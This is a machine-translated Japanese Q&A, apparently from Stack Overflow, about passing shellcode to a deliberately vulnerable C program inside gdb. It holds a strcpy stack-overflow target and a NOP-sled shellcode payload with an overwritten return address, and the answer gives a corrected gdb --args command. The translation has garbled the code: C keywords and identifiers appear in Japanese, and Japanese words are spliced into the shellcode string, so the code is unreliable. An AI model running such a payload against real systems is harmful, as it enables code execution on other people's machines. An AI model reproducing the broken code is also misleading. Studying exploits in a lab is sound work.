0

C プログラムのコマンドライン引数としてシェルコードを渡そうとしています。しかし、gdb は私に SyntaxError を与え続けます。私は何を間違っていますか?

以下は、C プログラムとシェルコードの内容です。

脆弱な.c

#include <stdio.h>
#include <string.h>

void Evilfunction(char *input)
{
    文字バッファ[1000];
    strcpy(バッファ、入力);
}

int main(int arc, char** argv)
{
    邪悪な関数 (argv[1]);
    0 を返します。
}

gdbで実行しているコマンドは次のとおりです。

$(python -c 'print “\x90” * 400 + "\xd9\xd0\xbd\xae\x95\x1b\xb9\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x0d\x31 を実行します。 \x68\x18\x03\x68\x18\x83\xc0\xaa\x77\xee\xd3\x89\x2f\x88\x6c\x56\xe0\xc8\x05\xc6\xd0\x7f\xbe\x16\x7c \xc8\xb7\xf1\xea\xe5\xa4\xfd\xea\xbd\xa3\x1b\xb8\xd5\xbe\xe3\x3d\x26\x90\x81\x54\x48\xc1\x21\xc6\xe7 \x75\xa9\x5e\x5f\xce\x20\xb8\x50\xcb" + "\x90" * 549 + "\x4c\x04\x40"')
4

1 に答える 1

1

GDB プロンプトでシェル構文を使用しようとしています。お気づきのとおり、GDB はサブコマンドのシェル構文をサポートしていません。代わりにこれを試してください:

gdb --args ./a.out $(python -c 'print “\x90” * 400 + "\xd9\xd0\xbd\xae\x95\x1b\xb9\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x0d\x31\x68\x18\x03\x68\x18\x83\xc0\xaa\x77\xee\xd3\x89\x2f\x88\x6c\x56\xe0\xc8\x05\xc6\xd0\x7f\xbe\x16\x7c\xc8\xb7\xf1\xea\xe5\xa4\xfd\xea\xbd\xa3\x1b\xb8\xd5\xbe\xe3\x3d\x26\x90\x81\x54\x48\xc1\x21\xc6\xe7\x75\xa9\x5e\x5f\xce\x20\xb8\x50\xcb" + “\x90” * 549 + “\x4c\x04\x40”')
(gdb) run
于 2012-10-06T14:16:31.730 に答える